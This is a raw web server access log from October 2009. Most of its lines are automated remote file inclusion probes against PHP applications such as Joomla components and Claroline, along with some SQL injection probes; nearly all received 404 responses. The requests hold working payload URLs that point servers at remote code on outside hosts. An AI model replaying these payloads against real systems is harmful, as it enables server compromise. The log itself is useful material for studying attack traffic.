222.73.17.7 - - [17/Oct/2009:00:49:25 -0400] "GET /logs//skin/dognara_gallery/setup.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:00:49:25 -0400] "GET //skin/dognara_gallery/setup.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:49:27 -0400] "GET /logs/access_log.Q109071000%20%20/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:00:49:36 -0400] "GET /logs/access_log.Q109073100%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
94.75.245.36 - - [17/Oct/2009:00:49:36 -0400] "GET /logs/access_log.Q109092200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:00:49:36 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:00:49:36 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
87.139.66.104 - - [17/Oct/2009:00:49:50 -0400] "GET /logs/access_log.Q109052700/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:49:50 -0400] "GET /logs/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:49:51 -0400] "GET /!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:49:51 -0400] "GET /logs/access_log.Q109071000/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:00:49:51 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:00:49:59 -0400] "GET /logs/access_log.Q109052400//skin/dognara_gallery/setup.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:00:49:59 -0400] "GET /logs/access_log.Q109072200%20%20/?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:00:50:00 -0400] "GET /logs/access_log.Q109052400//skin/dognara_gallery/setup.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
94.75.245.36 - - [17/Oct/2009:00:50:11 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
82.193.15.3 - - [17/Oct/2009:00:50:25 -0400] "GET /logs/access_log.Q109072000%20%20/?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:50:28 -0400] "GET /logs/access_log.Q109071000/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:50:28 -0400] "GET /logs/access_log.Q109052700/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:50:28 -0400] "GET /logs/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:50:31 -0400] "GET /!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.43.202.66 - - [17/Oct/2009:00:50:48 -0400] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
211.43.202.66 - - [17/Oct/2009:00:50:48 -0400] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.98.17.54 - - [17/Oct/2009:00:51:33 -0400] "GET /logs//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:51:33 -0400] "GET //index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:51:33 -0400] "GET /logs/access_log.Q109082500%20%20//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:51:34 -0400] "GET //index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:51:34 -0400] "GET /logs/access_log.Q109082500%20%20//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:51:34 -0400] "GET /logs//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.134.195.174 - - [17/Oct/2009:00:51:37 -0400] "GET /logs/error_log.Q109082100%20%20///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.134.195.174 - - [17/Oct/2009:00:51:37 -0400] "GET /logs/access_log.Q109082100%20%20///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.134.195.174 - - [17/Oct/2009:00:51:37 -0400] "GET /logs///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.134.195.174 - - [17/Oct/2009:00:51:37 -0400] "GET ///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.134.195.174 - - [17/Oct/2009:00:51:39 -0400] "GET /logs/access_log.Q109082100%20%20///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.134.195.174 - - [17/Oct/2009:00:51:39 -0400] "GET /logs///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.134.195.174 - - [17/Oct/2009:00:51:40 -0400] "GET /logs/error_log.Q109082100%20%20///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.134.195.174 - - [17/Oct/2009:00:51:40 -0400] "GET ///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:51:48 -0400] "GET /logs/error_log.Q109082500%20%20//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:51:49 -0400] "GET /logs/error_log.Q109082500%20%20//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:00:52:41 -0400] "GET /logs/access_log.Q109091400%20%20/?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:00:53:54 -0400] "GET /logs/error_log.Q109092500/products.php?id=' HTTP/1.1" 404 236 "-" "libwww-perl/5.832"
209.97.212.185 - - [17/Oct/2009:00:53:54 -0400] "GET /products.php?id=' HTTP/1.1" 404 210 "-" "libwww-perl/5.832"
209.97.212.185 - - [17/Oct/2009:00:53:55 -0400] "GET /logs/products.php?id=' HTTP/1.1" 404 215 "-" "libwww-perl/5.832"
209.59.12.99 - - [17/Oct/2009:00:54:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.139.66.104 - - [17/Oct/2009:00:54:43 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 260 "-" "libwww-perl/5.816"
211.218.40.180 - - [17/Oct/2009:00:54:43 -0400] "GET /!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:54:44 -0400] "GET /logs/access_log.Q109052700/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:54:44 -0400] "GET /logs/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:54:44 -0400] "GET /logs/access_log.Q109071000/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:54:49 -0400] "GET /logs/access_log.Q109062000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 282 "-" "libwww-perl/5.816"
87.139.66.104 - - [17/Oct/2009:00:54:49 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 255 "-" "libwww-perl/5.816"
121.134.195.174 - - [17/Oct/2009:00:55:00 -0400] "GET /logs/error_log.Q109082100///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:55:11 -0400] "GET /logs/access_log.Q109071200//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 282 "-" "libwww-perl/5.816"
121.134.195.174 - - [17/Oct/2009:00:55:16 -0400] "GET /logs/error_log.Q109082100///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:00:55:18 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:00:55:28 -0400] "GET /logs/error_log.Q109091200%20%20/?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:00:57:01 -0400] "GET /logs/error_log.Q109082100%20%20///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:00:57:01 -0400] "GET ///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:00:57:01 -0400] "GET /logs/access_log.Q109082100%20%20///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:00:57:01 -0400] "GET /logs///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:00:57:09 -0400] "GET ///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:00:57:09 -0400] "GET /logs/error_log.Q109092100%20%20///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:00:57:09 -0400] "GET /logs///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:00:57:13 -0400] "GET /logs/error_log.Q109092100%20%20///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:00:57:13 -0400] "GET /logs///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:00:57:13 -0400] "GET ///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:00:57:22 -0400] "GET /logs/access_log.Q109080100%20%20///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:00:57:22 -0400] "GET /logs/access_log.Q109080100%20%20///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:00:57:48 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:00:57:48 -0400] "GET /logs/access_log.Q109092200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:00:57:48 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.64.60.3 - - [17/Oct/2009:00:57:52 -0400] "GET /logs/index.php HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:00:57:58 -0400] "GET /logs/access_log.Q109092200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:00:57:58 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:00:57:59 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:58:05 -0400] "GET /logs/access_log.Q109082500//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:58:06 -0400] "GET /logs/error_log.Q109082500//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
68.108.111.91 - - [17/Oct/2009:00:58:07 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
65.98.17.54 - - [17/Oct/2009:00:58:11 -0400] "GET /logs/access_log.Q109082500//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
98.151.177.173 - - [17/Oct/2009:00:58:11 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.151.177.173 - - [17/Oct/2009:00:58:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.98.17.54 - - [17/Oct/2009:00:58:12 -0400] "GET /logs/error_log.Q109082500//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:00:58:13 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:00:58:18 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.64.60.3 - - [17/Oct/2009:00:58:25 -0400] "GET /index.php HTTP/1.1" 404 207 "-" "Mozilla/5.0"
98.151.177.173 - - [17/Oct/2009:00:58:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.151.177.173 - - [17/Oct/2009:00:58:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
85.17.19.172 - - [17/Oct/2009:00:58:30 -0400] "GET /logs/access_log.Q109071600///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:00:58:30 -0400] "GET /logs///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:00:58:30 -0400] "GET ///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.64.60.3 - - [17/Oct/2009:00:58:32 -0400] "GET /logs/access_log.Q109072200%20%20/index.php HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:00:58:32 -0400] "GET ///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:00:58:32 -0400] "GET /logs///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:00:58:32 -0400] "GET /logs/access_log.Q109071600///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:00:58:47 -0400] "GET /logs/error_log.Q109090500///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:00:58:51 -0400] "GET /logs/error_log.Q109090500///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:00:59:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.43.202.66 - - [17/Oct/2009:00:59:16 -0400] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
211.43.202.66 - - [17/Oct/2009:00:59:16 -0400] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
85.17.19.172 - - [17/Oct/2009:00:59:44 -0400] "GET /logs/access_log.Q109071600%20%20///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:00:59:45 -0400] "GET /logs/access_log.Q109071600%20%20///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:00:59:48 -0400] "GET /logs/error_log.Q109090500%20%20///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:00:59:50 -0400] "GET /logs/error_log.Q109090500%20%20///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
119.63.199.40 - - [17/Oct/2009:00:59:48 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 73511 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
209.97.212.185 - - [17/Oct/2009:01:00:00 -0400] "GET /logs/access_log.Q109092500/products.php?id=' HTTP/1.1" 404 237 "-" "libwww-perl/5.832"
208.104.2.18 - - [17/Oct/2009:00:59:57 -0400] "GET /images/monthly_specials.jpg HTTP/1.0" 200 73909 "-" "-"
202.29.20.126 - - [17/Oct/2009:01:00:47 -0400] "GET /logs/access_log.Q109082100%20%20///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:01:00:47 -0400] "GET /logs///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:01:00:47 -0400] "GET ///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:01:00:47 -0400] "GET /logs/error_log.Q109082100%20%20///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:01:01:08 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:01:01:08 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:01:01:08 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:01:19 -0400] "GET /logs/access_log.Q109083100%20%20///faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
